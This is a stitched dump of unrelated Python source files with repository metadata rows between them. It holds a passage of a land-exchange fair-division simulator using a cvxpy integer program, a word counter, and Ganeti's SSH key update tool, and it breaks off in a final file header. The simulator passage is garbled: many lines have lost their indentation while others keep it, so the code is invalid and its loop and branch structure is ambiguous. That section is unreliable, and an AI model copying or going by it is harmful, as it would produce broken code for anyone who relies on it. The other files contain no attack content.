        one_numbers = random.sample(range(len(self.list_exchange[one][two])), min(sides1, len(self.list_exchange[one][two])))
        # indices of randomly sampled candidate plots of the second country
        two_numbers = random.sample(range(len(self.list_exchange[two][one])), min(sides2, len(self.list_exchange[two][one])))
        # fill the set of plots offered by the first country
for elem in one_numbers:
eleme = self.list_exchange[one][two][elem]
if len(self.map_exchange[-1][eleme[0]][eleme[1]]) == 0:
if eleme not in first:
first.append(eleme)
else:
no = 0
for element in self.map_exchange[-1][eleme[0]][eleme[1]]:
if len(self.map_exchange[two][element[0] + eleme[0]][element[1] + eleme[1]]) == 0:
no = 1
break
if no == 0:
if eleme not in first:
first.append(eleme)
for element in self.map_exchange[-1][eleme[0]][eleme[1]]:
if [element[0] + eleme[0], element[1] + eleme[1]] not in first:
first.append([element[0] + eleme[0], element[1] + eleme[1]])
if len(first) >= sides1:
break
        # fill the set of plots offered by the second country
for elem in two_numbers:
eleme = self.list_exchange[two][one][elem]
if len(self.map_exchange[-1][eleme[0]][eleme[1]]) == 0:
if eleme not in second:
second.append(eleme)
else:
no = 0
for element in self.map_exchange[-1][eleme[0]][eleme[1]]:
if len(self.map_exchange[one][element[0] + eleme[0]][element[1] + eleme[1]]) == 0:
no = 1
break
if no == 0:
if eleme not in second:
second.append(eleme)
for element in self.map_exchange[-1][eleme[0]][eleme[1]]:
if [element[0] + eleme[0], element[1] + eleme[1]] not in second:
second.append([element[0] + eleme[0], element[1] + eleme[1]])
if len(second) >= sides2:
break
        # build the constraint lists for the first country
for i in range(len(first)):
team = len(self.map_exchange[one][first[i][0]][first[i][1]])
teammates = []
enemies = []
enemy = len(self.map_exchange[two][first[i][0]][first[i][1]])
for elem in self.map_exchange[one][first[i][0]][first[i][1]]:
if ([elem[0] + first[i][0], elem[1] + first[i][1]] in first):
team -= 1
teammates.append(first.index([elem[0] + first[i][0], elem[1] + first[i][1]]))
if team == 0:
constteamone.append([i, teammates])
for elem in self.map_exchange[two][first[i][0]][first[i][1]]:
if ([elem[0] + first[i][0], elem[1] + first[i][1]] in second):
enemy -= 1
enemies.append(second.index([elem[0] + first[i][0], elem[1] + first[i][1]]))
if enemy == 0:
constenemyone.append([i, enemies])
        # build the constraint lists for the second country
for i in range(len(second)):
team = len(self.map_exchange[two][second[i][0]][second[i][1]])
teammates = []
enemies = []
enemy = len(self.map_exchange[one][second[i][0]][second[i][1]])
for elem in self.map_exchange[two][second[i][0]][second[i][1]]:
if ([elem[0] + second[i][0], elem[1] + second[i][1]] in second):
team -= 1
teammates.append(second.index([elem[0] + second[i][0], elem[1] + second[i][1]]))
if team == 0:
constteamtwo.append([i, teammates])
for elem in self.map_exchange[one][second[i][0]][second[i][1]]:
if ([elem[0] + second[i][0], elem[1] + second[i][1]] in first):
enemy -= 1
enemies.append(first.index([elem[0] + second[i][0], elem[1] + second[i][1]]))
if enemy == 0:
constenemytwo.append([i, enemies])
        # fill the satisfaction-change lists for both countries
for elem in first:
firstsati.append([-self.unos[elem[0]][elem[1]][4][one], self.unos[elem[0]][elem[1]][4][two]])
for elem in second:
secondsati.append([self.unos[elem[0]][elem[1]][4][one], -self.unos[elem[0]][elem[1]][4][two]])
        if (len(first) == 0) or (len(second) == 0):  # if either side has nothing to trade, stop
            return 0
        sati1 = firstsati + secondsati  # merge the utility-change lists
        selection1 = cvxpy.Bool(len(sati1))  # boolean indicators: does the plot take part in the exchange
        z = cvxpy.Variable()  # the smaller of the two countries' gains, to be maximised
        a = len(first)
        constraint1 = [z <= np.array(sati1)[:, 1] * selection1, z <= np.array(sati1)[:, 0] * selection1]  # max-min condition
        # add the connectivity constraints
for elem in constteamone:
constraint1.append(selection1[elem[0]] - cvxpy.sum_entries(selection1[elem[1]]) >= 1 - len(elem[1]))
for elem in constteamtwo:
constraint1.append(selection1[elem[0] + a] - cvxpy.sum_entries(selection1[[i + a for i in elem[1]]]) >= 1 - len(elem[1]))
for elem in constenemyone:
            constraint1.append(selection1[elem[0]] + cvxpy.sum_entries(selection1[[i + a for i in elem[1]]]) <= len(elem[1]))
for elem in constenemytwo:
constraint1.append(selection1[elem[0] + a] + cvxpy.sum_entries(selection1[elem[1]]) <= len(elem[1]))
        total_utility1 = z  # the objective: maximise z
my_problem1 = cvxpy.Problem(cvxpy.Maximize(total_utility1), constraint1)
        my_problem1.solve(solver=cvxpy.GLPK_MI)  # solve the MILP
        first1 = (np.array(sati1)[:, 0] * selection1).value  # satisfaction gain of the first country
        second1 = (np.array(sati1)[:, 1] * selection1).value  # satisfaction gain of the second country
        if (first1 != 0 or second1 != 0):  # if at least one of them is better off
            self.i_exch2 += 1  # bump the exchange counter
            for j in range(len(selection1.value)):  # for every plot that changes hands
                if selection1[j].value:
                    if j < a:  # from the first country to the second
                        self.redact_exch(first[j][0], first[j][1], one, two)  # update the feasible-exchange maps
                        self.belong(first[j][0], first[j][1], two, 'Exchange ' + str(min(sides1, sides2)))
                    else:  # from the second country to the first
                        j2 = j - a
                        self.redact_exch(second[j2][0], second[j2][1], two, one)  # update the feasible-exchange maps
                        self.belong(second[j2][0], second[j2][1], one, 'Exchange ' + str(min(sides1, sides2)))
            exch_info = str(sorted([int(sum(selection1.value[:a])), int(sum(selection1.value[a:]))]))
if self.exchanged[1].get(exch_info) == None:
self.exchanged[1][exch_info] = 1
else:
self.exchanged[1][exch_info] += 1
if self.exchanged[2].get(int(sum(selection1.value))) == None:
self.exchanged[2][int(sum(selection1.value))] = 1
else:
self.exchanged[2][int(sum(selection1.value))] += 1
return 1
return 0
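    # A minimal standalone sketch of the max-min selection problem solved in exch()
    # above, written against the modern cvxpy API (cvxpy.Bool / sum_entries above are
    # from the pre-1.0 API); the numbers are illustrative and GLPK_MI is assumed to
    # be installed:
    #
    #     import cvxpy as cp
    #     import numpy as np
    #     gains = np.array([[-1.0, 3.0], [2.0, -0.5]])  # per-plot gain for (country one, country two)
    #     pick = cp.Variable(gains.shape[0], boolean=True)
    #     z = cp.Variable()
    #     cons = [z <= gains[:, 0] @ pick, z <= gains[:, 1] @ pick]
    #     cp.Problem(cp.Maximize(z), cons).solve(solver=cp.GLPK_MI)
    #     # picking both plots gives gains (1.0, 2.5), so the optimum is z = 1.0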
    # UPDATES THE FEASIBLE-EXCHANGE MAPS AFTER A PLOT TRANSFER (row, column, from which country, to which country)
def redact_exch(self, first, last, one, two):
if (first != 0) and (len(self.map_exchange[one][first - 1][last]) == 1) and (self.unos[first - 1][last][2] not in [one + 1, 0, -1]) and not self.unos[first - 1][last][1]:
self.list_exchange[self.unos[first - 1][last][2] - 1][one].remove([first - 1, last])
if (first != len(self.unos) - 1) and (len(self.map_exchange[one][first + 1][last]) == 1) and (self.unos[first + 1][last][2] not in [one + 1, 0, -1]) and not self.unos[first + 1][last][1]:
self.list_exchange[self.unos[first + 1][last][2] - 1][one].remove([first + 1, last])
if (last != 0) and (len(self.map_exchange[one][first][last - 1]) == 1) and (self.unos[first][last - 1][2] not in [one + 1, 0, -1]) and not self.unos[first][last - 1][1]:
self.list_exchange[self.unos[first][last - 1][2] - 1][one].remove([first, last - 1])
if (last != len(self.unos[0]) - 1) and (len(self.map_exchange[one][first][last + 1]) == 1) and (self.unos[first][last + 1][2] not in [one + 1, 0, -1]) and not self.unos[first][last + 1][1]:
self.list_exchange[self.unos[first][last + 1][2] - 1][one].remove([first, last + 1])
        # add the plot's neighbours to the new owner's exchange lists
if (first != 0) and (len(self.map_exchange[two][first - 1][last]) == 0) and (self.unos[first - 1][last][2] not in [two + 1, 0, -1]) and not self.unos[first - 1][last][1]:
self.list_exchange[self.unos[first - 1][last][2] - 1][two].append([first - 1, last])
if (first != len(self.unos) - 1) and (len(self.map_exchange[two][first + 1][last]) == 0) and (self.unos[first + 1][last][2] not in [two + 1, 0, -1]) and not self.unos[first + 1][last][1]:
self.list_exchange[self.unos[first + 1][last][2] - 1][two].append([first + 1, last])
if (last != 0) and (len(self.map_exchange[two][first][last - 1]) == 0) and (self.unos[first][last - 1][2] not in [two + 1, 0, -1]) and not self.unos[first][last - 1][1]:
self.list_exchange[self.unos[first][last - 1][2] - 1][two].append([first, last - 1])
if (last != len(self.unos[0]) - 1) and (len(self.map_exchange[two][first][last + 1]) == 0) and (self.unos[first][last + 1][2] not in [two + 1, 0, -1]) and not self.unos[first][last + 1][1]:
self.list_exchange[self.unos[first][last + 1][2] - 1][two].append([first, last + 1])
        # remove the old self from the neighbours' lists and add the new self to them
team1 = []
enemy1 = []
if (first != 0) and (self.unos[first - 1][last][2] not in [-1, 0]):
if self.unos[first - 1][last][2] != one + 1:
team1.append(self.unos[first - 1][last][2])
if self.unos[first - 1][last][2] != two + 1:
enemy1.append(self.unos[first - 1][last][2])
if (first != len(self.unos) - 1) and (self.unos[first + 1][last][2] not in [-1, 0]):
if self.unos[first + 1][last][2] != one + 1:
team1.append(self.unos[first + 1][last][2])
if self.unos[first + 1][last][2] != two + 1:
enemy1.append(self.unos[first + 1][last][2])
if (last != 0) and (self.unos[first][last - 1][2] not in [-1, 0]):
if self.unos[first][last - 1][2] != one + 1:
team1.append(self.unos[first][last - 1][2])
if self.unos[first][last - 1][2] != two + 1:
enemy1.append(self.unos[first][last - 1][2])
if (last != len(self.unos[0]) - 1) and (self.unos[first][last + 1][2] not in [-1, 0]):
if self.unos[first][last + 1][2] != one + 1:
team1.append(self.unos[first][last + 1][2])
if self.unos[first][last + 1][2] != two + 1:
enemy1.append(self.unos[first][last + 1][2])
for elem in list(set(team1)):
self.list_exchange[one][elem - 1].remove([first, last])
for elem in list(set(enemy1)):
self.list_exchange[two][elem - 1].append([first, last])
        self.map_exchange[-1][first][last] = []  # reset the plot's own danger entry
        # rebuild the plot's own danger entry
if (first != 0) and (self.map_exchange[two][first - 1][last] == []) and (self.unos[first - 1][last][2] == two + 1) and not self.unos[first - 1][last][1]:
self.map_exchange[-1][first][last].append([-1, 0])
if (first != len(self.unos) - 1) and (self.map_exchange[two][first + 1][last] == []) and (self.unos[first + 1][last][2] == two + 1) and not self.unos[first + 1][last][1]:
self.map_exchange[-1][first][last].append([1, 0])
if (last != 0) and (self.map_exchange[two][first][last - 1] == []) and (self.unos[first][last - 1][2] == two + 1) and not self.unos[first][last - 1][1]:
self.map_exchange[-1][first][last].append([0, -1])
if (last != len(self.unos[0]) - 1) and (self.map_exchange[two][first][last + 1] == []) and (self.unos[first][last + 1][2] == two + 1) and not self.unos[first][last + 1][1]:
self.map_exchange[-1][first][last].append([0, 1])
        if len(self.map_exchange[one][first][last]) == 1:  # reset the former owner's danger entry
self.map_exchange[-1][self.map_exchange[one][first][last][0][0] + first][self.map_exchange[one][first][last][0][1] + last].remove([-self.map_exchange[one][first][last][0][0], -self.map_exchange[one][first][last][0][1]])
        # the plot itself may have become dangerous
if len(self.map_exchange[two][first][last]) == 1:
self.map_exchange[-1][self.map_exchange[two][first][last][0][0] + first][self.map_exchange[two][first][last][0][1] + last].append([-self.map_exchange[two][first][last][0][0], -self.map_exchange[two][first][last][0][1]])
        # the transfer may have rescued newly dangerous plots
if (first != 0) and (len(self.map_exchange[two][first - 1][last]) == 1) and (self.unos[first - 1][last][2] == two + 1) and not self.unos[first - 1][last][1]:
self.map_exchange[-1][self.map_exchange[two][first - 1][last][0][0] + first - 1][self.map_exchange[two][first - 1][last][0][1] + last].remove([-self.map_exchange[two][first - 1][last][0][0], -self.map_exchange[two][first - 1][last][0][1]])
if (first != len(self.unos) - 1) and (len(self.map_exchange[two][first + 1][last]) == 1) and (self.unos[first + 1][last][2] == two + 1) and not self.unos[first + 1][last][1]:
self.map_exchange[-1][self.map_exchange[two][first + 1][last][0][0] + first + 1][self.map_exchange[two][first + 1][last][0][1] + last].remove([-self.map_exchange[two][first + 1][last][0][0], -self.map_exchange[two][first + 1][last][0][1]])
if (last != 0) and (len(self.map_exchange[two][first][last - 1]) == 1) and (self.unos[first][last - 1][2] == two + 1) and not self.unos[first][last - 1][1]:
self.map_exchange[-1][self.map_exchange[two][first][last - 1][0][0] + first][self.map_exchange[two][first][last - 1][0][1] + last - 1].remove([-self.map_exchange[two][first][last - 1][0][0], -self.map_exchange[two][first][last - 1][0][1]])
if (last != len(self.unos[0]) - 1) and (len(self.map_exchange[two][first][last + 1]) == 1) and (self.unos[first][last + 1][2] == two + 1) and not self.unos[first][last + 1][1]:
self.map_exchange[-1][self.map_exchange[two][first][last + 1][0][0] + first][self.map_exchange[two][first][last + 1][0][1] + last + 1].remove([-self.map_exchange[two][first][last + 1][0][0], -self.map_exchange[two][first][last + 1][0][1]])
        # drop the old adjacencies and add the new ones
if first != 0:
self.map_exchange[one][first - 1][last].remove([1, 0])
self.map_exchange[two][first - 1][last].append([1, 0])
if first != len(self.unos) - 1:
self.map_exchange[one][first + 1][last].remove([-1, 0])
self.map_exchange[two][first + 1][last].append([-1, 0])
if last != 0:
self.map_exchange[one][first][last - 1].remove([0, 1])
self.map_exchange[two][first][last - 1].append([0, 1])
if last != len(self.unos[0]) - 1:
self.map_exchange[one][first][last + 1].remove([0, -1])
self.map_exchange[two][first][last + 1].append([0, -1])
        # the transfer may have made old neighbours dangerous
if (first != 0) and (len(self.map_exchange[one][first - 1][last]) == 1) and (self.unos[first - 1][last][2] == one + 1) and not self.unos[first - 1][last][1]:
self.map_exchange[-1][self.map_exchange[one][first - 1][last][0][0] + first - 1][self.map_exchange[one][first - 1][last][0][1] + last].append([-self.map_exchange[one][first - 1][last][0][0], -self.map_exchange[one][first - 1][last][0][1]])
if (first != len(self.unos) - 1) and (len(self.map_exchange[one][first + 1][last]) == 1) and (self.unos[first + 1][last][2] == one + 1) and not self.unos[first + 1][last][1]:
self.map_exchange[-1][self.map_exchange[one][first + 1][last][0][0] + first + 1][self.map_exchange[one][first + 1][last][0][1] + last].append([-self.map_exchange[one][first + 1][last][0][0], -self.map_exchange[one][first + 1][last][0][1]])
if (last != 0) and (len(self.map_exchange[one][first][last - 1]) == 1) and (self.unos[first][last - 1][2] == one + 1) and not self.unos[first][last - 1][1]:
self.map_exchange[-1][self.map_exchange[one][first][last - 1][0][0] + first][self.map_exchange[one][first][last - 1][0][1] + last - 1].append([-self.map_exchange[one][first][last - 1][0][0], -self.map_exchange[one][first][last - 1][0][1]])
if (last != len(self.unos[0]) - 1) and (len(self.map_exchange[one][first][last + 1]) == 1) and (self.unos[first][last + 1][2] == one + 1) and not self.unos[first][last + 1][1]:
self.map_exchange[-1][self.map_exchange[one][first][last + 1][0][0] + first][self.map_exchange[one][first][last + 1][0][1] + last + 1].append([-self.map_exchange[one][first][last + 1][0][0], -self.map_exchange[one][first][last + 1][0][1]])
    # HANDS THE DONOR COUNTRY'S MOST PROFITABLE PLOT TO THE RECIPIENT (donor index, recipient index);
    def chari(self, maxi_i, mini_i):  # returns 1 if a plot was transferred, 0 otherwise
        sys.stdout.write("Charity: {0}, exchange: {1} ({4}), Try from {2} to {3}              \r".format(str(self.i_char),
                                                                                                         str(self.i_exch),
                                                                                                         self.names[maxi_i],
                                                                                                         self.names[mini_i], self.i_exch2))
        ind_max = 0  # coordinates of the best plot found
        maximum = 0  # largest relative utility ratio found so far
        for i in self.list_exchange[maxi_i][mini_i]:  # walk over the donor's border plots
            firs = i[0]
            las = i[1]
            if ([self.countries[mini_i][1], self.countries[maxi_i][1]] < [self.countries[maxi_i][1] - 2 * self.unos[firs][las][4][maxi_i], self.countries[mini_i][1] + 2 * self.unos[firs][las][4][mini_i]]
               and  # if the transfer makes sense at all
               # and its relative utility ratio is the largest so far
               maximum < (self.unos[firs][las][4][mini_i] / (self.unos[firs][las][4][maxi_i] + sys.float_info.epsilon))):
                maximum = (self.unos[firs][las][4][mini_i] / (self.unos[firs][las][4][maxi_i] + sys.float_info.epsilon))
                ind_max = i  # remember the chosen plot's coordinates
        if (ind_max != 0):  # if a suitable plot was found
            self.redact_exch(ind_max[0], ind_max[1], maxi_i, mini_i)  # update the feasible-exchange maps
            self.belong(ind_max[0], ind_max[1], mini_i, 'Charity ')  # transfer the plot
            return 1  # report that a transfer happened
        return 0
    # THE RICHEST COUNTRY GIVES TO THE POOREST VIA CHARI
    def one_charity(self):
        min1 = self.min_sat()[1]  # remember the least satisfied country
        max1 = self.max_sat()[1]  # remember the most satisfied country
        result = self.chari(max1, min1)  # remember whether a transfer happened
        while result:  # while giving still makes sense
            min1 = self.min_sat()[1]  # repeat
            max1 = self.max_sat()[1]
            result = self.chari(max1, min1)
    # EVERY COUNTRY GIVES TO THE POOREST ONE
    def all_charity(self):
        maxsat = self.max_sat()[1]  # remember the richest country
        self.one_charity()  # the richest gives to the poorest
        self.ind[maxsat] = 1  # block the richest
        if self.ind.count(0) > 1:  # if there is still someone left to give, repeat
            self.all_charity()
        self.ind[self.max_sat_re()[1]] = 0  # restore the indicator
    # EVERY COUNTRY GIVES TO EVERY OTHER (RICHEST TO POOREST)
    def total_charity(self):
        minsat = self.min_sat()[1]  # remember the poorest country
        self.all_charity()  # everyone gives to it
        self.ind[minsat] = 1  # block it
        if self.ind.count(0) > 1:  # repeat with the next country while any remain
            self.total_charity()
        else:
            for i in range(len(self.ind)):  # reset the indicators
                self.ind[i] = 0
    ## HELPER FUNCTIONS FOR REPORTS
    # ENVY OF THE FIRST COUNTRY TOWARDS THE SECOND (first country index, second country index)
    def envy(self, coun_1, coun_2):
        result = 0  # accumulated envy
        for i in range(len(self.countries[coun_1][3])):  # add the utility of the first country's own plots
            result += self.unos[self.countries[coun_1][3][i][0]][self.countries[coun_1][3][i][1]][4][coun_1]
        for i in range(len(self.countries[coun_2][3])):  # subtract the utility the second country's plots would bring it
            result -= self.unos[self.countries[coun_2][3][i][0]][self.countries[coun_2][3][i][1]][4][coun_1]
        if self.percent == False:
            return int(result)
        return round(result, 3)
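    # A tiny worked example of the envy measure (a sketch with made-up numbers):
    # if country A values its own plots at 10 + 5 = 15 and would value country B's
    # plots at 8 + 12 = 20, then envy(A, B) = 15 - 20 = -5. A negative value means
    # A would prefer B's allocation to its own (A envies B), while a non-negative
    # value for every ordered pair would make the division envy-free.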
|
[
"noreply@github.com"
] |
vampiirre.noreply@github.com
|
53d12f540c00edd4490afc63f713584360966ba7
|
cec21b1d674aaf7d62d7730e637229577a2e27e2
|
/First_WebApp/counter.py
|
bb45d5e811601fba683b7e124370451ce0b1addd
|
[] |
no_license
|
arpitntripathi/first_WebApp
|
50028c0d792581f3c0639d07333d087035503e22
|
584095a61476bbc8c82d92e95526fa4008c788de
|
refs/heads/master
| 2022-12-23T23:52:01.117763
| 2020-09-12T20:34:29
| 2020-09-12T20:34:29
| 254,751,588
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 365
|
py
|
import operator
def count(article):
words = article.split()
word_count = len(words)
dict_words = {}
for word in words:
if word in dict_words:
dict_words[word] += 1
else:
dict_words[word] = 1
var_dict = sorted(dict_words.items(), key=operator.itemgetter(1), reverse=True)
return var_dict, word_count
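# A small self-check (hypothetical input, not part of the original module):
if __name__ == "__main__":
    freq, total = count("the cat saw the dog and the cat")
    print(total)    # 8 words
    print(freq[0])  # ('the', 3) -- the most frequent word comes first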
|
[
"arpitnathtripathi@gmail.com"
] |
arpitnathtripathi@gmail.com
|
288a244c7b7b0c75beeca7844880dcf05b568272
|
ab41cbae15cbbaac52ec7db5da568b337d232bf6
|
/lib/tools/ssh_update.py
|
f9d1b6db3f56e7fcd50aa5b66a06fbe27614fb08
|
[
"BSD-2-Clause"
] |
permissive
|
skycover/ganeti-2.15.2
|
9d6eef72cd1c7942c7b293c4bcc4c0b62f880e9f
|
db69c3917c1ae00f31943c52c147c7938ce64d9c
|
refs/heads/master
| 2021-01-24T13:24:02.294516
| 2018-02-27T18:52:36
| 2018-02-27T18:52:36
| 123,173,553
| 0
| 0
| null | 2018-02-27T18:53:46
| 2018-02-27T18:53:46
| null |
UTF-8
|
Python
| false
| false
| 7,218
|
py
|
#
#
# Copyright (C) 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script to update a node's SSH key files.
This script is used to update the node's 'authorized_keys' and
'ganeti_pub_key' files. It will be called via SSH from the master
node.
"""
import os
import os.path
import optparse
import sys
import logging
from ganeti import cli
from ganeti import constants
from ganeti import errors
from ganeti import utils
from ganeti import ht
from ganeti import ssh
from ganeti import pathutils
from ganeti.tools import common
_DATA_CHECK = ht.TStrictDict(False, True, {
constants.SSHS_CLUSTER_NAME: ht.TNonEmptyString,
constants.SSHS_NODE_DAEMON_CERTIFICATE: ht.TNonEmptyString,
constants.SSHS_SSH_PUBLIC_KEYS:
ht.TItems(
[ht.TElemOf(constants.SSHS_ACTIONS),
ht.TDictOf(ht.TNonEmptyString, ht.TListOf(ht.TNonEmptyString))]),
constants.SSHS_SSH_AUTHORIZED_KEYS:
ht.TItems(
[ht.TElemOf(constants.SSHS_ACTIONS),
ht.TDictOf(ht.TNonEmptyString, ht.TListOf(ht.TNonEmptyString))]),
constants.SSHS_GENERATE: ht.TDictOf(ht.TNonEmptyString, ht.TString),
})
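# A hypothetical example of the JSON payload this tool expects on stdin, inferred
# from the _DATA_CHECK schema above (the literal key names come from
# ganeti.constants and may differ; all values are illustrative only):
#
#   {"cluster_name": "cluster.example.com",
#    "node_daemon_certificate": "-----BEGIN CERTIFICATE-----...",
#    "ssh_public_keys": ["add", {"node-uuid-1": ["ssh-rsa AAAA..."]}],
#    "ssh_authorized_keys": ["add", {"node-uuid-1": ["ssh-rsa AAAA..."]}]}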
class SshUpdateError(errors.GenericError):
"""Local class for reporting errors.
"""
def ParseOptions():
"""Parses the options passed to the program.
@return: Options and arguments
"""
program = os.path.basename(sys.argv[0])
parser = optparse.OptionParser(
usage="%prog [--dry-run] [--verbose] [--debug]", prog=program)
parser.add_option(cli.DEBUG_OPT)
parser.add_option(cli.VERBOSE_OPT)
parser.add_option(cli.DRY_RUN_OPT)
(opts, args) = parser.parse_args()
return common.VerifyOptions(parser, opts, args)
def UpdateAuthorizedKeys(data, dry_run, _homedir_fn=None):
"""Updates root's C{authorized_keys} file.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
instructions = data.get(constants.SSHS_SSH_AUTHORIZED_KEYS)
if not instructions:
logging.info("No change to the authorized_keys file requested.")
return
(action, authorized_keys) = instructions
(auth_keys_file, _) = \
ssh.GetAllUserFiles(constants.SSH_LOGIN_USER, mkdir=True,
_homedir_fn=_homedir_fn)
key_values = []
for key_value in authorized_keys.values():
key_values += key_value
if action == constants.SSHS_ADD:
if dry_run:
logging.info("This is a dry run, not adding keys to %s",
auth_keys_file)
else:
if not os.path.exists(auth_keys_file):
utils.WriteFile(auth_keys_file, mode=0600, data="")
ssh.AddAuthorizedKeys(auth_keys_file, key_values)
elif action == constants.SSHS_REMOVE:
if dry_run:
logging.info("This is a dry run, not removing keys from %s",
auth_keys_file)
else:
ssh.RemoveAuthorizedKeys(auth_keys_file, key_values)
else:
raise SshUpdateError("Action '%s' not implemented for authorized keys."
% action)
def UpdatePubKeyFile(data, dry_run, key_file=pathutils.SSH_PUB_KEYS):
"""Updates the file of public SSH keys.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
instructions = data.get(constants.SSHS_SSH_PUBLIC_KEYS)
if not instructions:
logging.info("No instructions to modify public keys received."
" Not modifying the public key file at all.")
return
(action, public_keys) = instructions
if action == constants.SSHS_OVERRIDE:
if dry_run:
logging.info("This is a dry run, not overriding %s", key_file)
else:
ssh.OverridePubKeyFile(public_keys, key_file=key_file)
elif action in [constants.SSHS_ADD, constants.SSHS_REPLACE_OR_ADD]:
if dry_run:
logging.info("This is a dry run, not adding or replacing a key to %s",
key_file)
else:
for uuid, keys in public_keys.items():
if action == constants.SSHS_REPLACE_OR_ADD:
ssh.RemovePublicKey(uuid, key_file=key_file)
for key in keys:
ssh.AddPublicKey(uuid, key, key_file=key_file)
elif action == constants.SSHS_REMOVE:
if dry_run:
logging.info("This is a dry run, not removing keys from %s", key_file)
else:
for uuid in public_keys.keys():
ssh.RemovePublicKey(uuid, key_file=key_file)
elif action == constants.SSHS_CLEAR:
if dry_run:
logging.info("This is a dry run, not clearing file %s", key_file)
else:
ssh.ClearPubKeyFile(key_file=key_file)
else:
raise SshUpdateError("Action '%s' not implemented for public keys."
% action)
def GenerateRootSshKeys(data, dry_run):
"""(Re-)generates the root SSH keys.
@type data: dict
@param data: Input data
@type dry_run: boolean
@param dry_run: Whether to perform a dry run
"""
generate_info = data.get(constants.SSHS_GENERATE)
if generate_info:
suffix = generate_info[constants.SSHS_SUFFIX]
if dry_run:
logging.info("This is a dry run, not generating any files.")
else:
common.GenerateRootSshKeys(SshUpdateError, _suffix=suffix)
def Main():
"""Main routine.
"""
opts = ParseOptions()
utils.SetupToolLogging(opts.debug, opts.verbose)
try:
data = common.LoadData(sys.stdin.read(), _DATA_CHECK)
# Check if input data is correct
common.VerifyClusterName(data, SshUpdateError, constants.SSHS_CLUSTER_NAME)
common.VerifyCertificateSoft(data, SshUpdateError)
# Update / Generate SSH files
UpdateAuthorizedKeys(data, opts.dry_run)
UpdatePubKeyFile(data, opts.dry_run)
GenerateRootSshKeys(data, opts.dry_run)
logging.info("Setup finished successfully")
except Exception, err: # pylint: disable=W0703
logging.debug("Caught unhandled exception", exc_info=True)
(retcode, message) = cli.FormatError(err)
logging.error(message)
return retcode
else:
return constants.EXIT_SUCCESS
|
[
"vs@ipatov.net"
] |
vs@ipatov.net
|
48d78e65acb643608b7d9a129ff13c6c9954b465
|
c15a50057951317728f4eaa1854904b53161c19e
|
/FM_FTRL/ftrl_utils/params.py
|
1b77ef869aa96fceab4d0c0f42338693acfd1c7b
|
[] |
no_license
|
marvinxu-free/talking_data
|
8ca3ecab5ed5585fd0db46cebd27148e71495d2a
|
1549fe13dc9489255c3c87dd6c13a65a1176ea07
|
refs/heads/master
| 2020-03-16T05:41:15.437712
| 2018-05-10T02:56:27
| 2018-05-10T02:56:27
| 132,538,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
# -*- coding: utf-8 -*-
# Project: ml_more_algorithm
# Author: chaoxu create this file
# Time: 2018/4/16
# Company : Maxent
# Email: chao.xu@maxent-inc.com
import os
module_path = os.path.split(os.path.realpath(__file__))[0]
Data_path = os.path.realpath("{0}/../../input".format(module_path))
train_file = '{0}/train_new_subsample.csv'.format(Data_path)
train_file_tmp = '{0}/train_subsample_tmp.csv'.format(Data_path)
test_file = '{0}/test.csv'.format(Data_path)
test_file_tmp = '{0}/test_tmp.csv'.format(Data_path)
predict_report_file = '{0}/predict.csv'.format(Data_path)
best_weights_file = '{0}/best.hdf5'.format(Data_path)
batchsize = 10000000
D = 2 ** 20
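# D = 2 ** 20 above is the size of the hashed feature space commonly paired with
# FTRL-style models: raw feature strings are mapped into [0, D) via the hashing
# trick. A minimal sketch; the helper name is illustrative, not part of this module:
def feature_index(feature, D=D):
    # hash a raw feature string into one of D buckets
    return hash(feature) % D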
|
[
"chao.xu@maxent-inc.com"
] |
chao.xu@maxent-inc.com
|
9eedcc25d03a6a9bc42984a3f718564309407905
|
48b50c0b525956fa2267b00021d52ca5ef715e81
|
/02-notifon/scale-up.py
|
061c708974183ea6f322a4a2c16cd5a2363eb13f
|
[] |
no_license
|
cashpole/automating-aws-with-python
|
2bcdb97fa4d7768a1a4ac581b16935262a20b27c
|
fb6bcf6da93f80fbd11944be080e7a34da993f3d
|
refs/heads/master
| 2022-12-08T20:09:59.514534
| 2019-07-01T19:18:07
| 2019-07-01T19:18:07
| 186,532,329
| 0
| 0
| null | 2022-09-08T08:22:31
| 2019-05-14T02:47:02
|
Python
|
UTF-8
|
Python
| false
| false
| 224
|
py
|
# coding: utf-8
import boto3
session = boto3.Session(profile_name='pythonAutomation')
as_client = session.client('autoscaling')
as_client.execute_policy(AutoScalingGroupName='Notifon Example Group', PolicyName='Scale Up')
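# The matching scale-down call would look like the line below, assuming a policy
# named 'Scale Down' exists on the same Auto Scaling group (hypothetical name):
# as_client.execute_policy(AutoScalingGroupName='Notifon Example Group', PolicyName='Scale Down')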
|
[
"cashpole@hotmail.com"
] |
cashpole@hotmail.com
|
f5a22a136e56bae2893f9a941bb1b6af17239b3a
|
17c266cef1c620d729cb8a9e3d9f47ce389c8c8f
|
/createclass.py
|
5021f3d1d2e81f759b077fa10c3f8fa9e62f953d
|
[] |
no_license
|
mubasil/flavortown
|
